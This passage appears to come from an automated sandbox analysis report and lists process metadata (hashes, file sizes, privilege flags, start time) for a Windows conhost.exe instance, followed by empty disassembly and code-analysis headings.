                                                    Imagebase:0x150000
                                                    File size:232960 bytes
                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:17:47:03
                                                    Start date:22/07/2021
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7ecfc0000
                                                    File size:625664 bytes
                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Disassembly

                                                    Code Analysis

                                                    Reset < >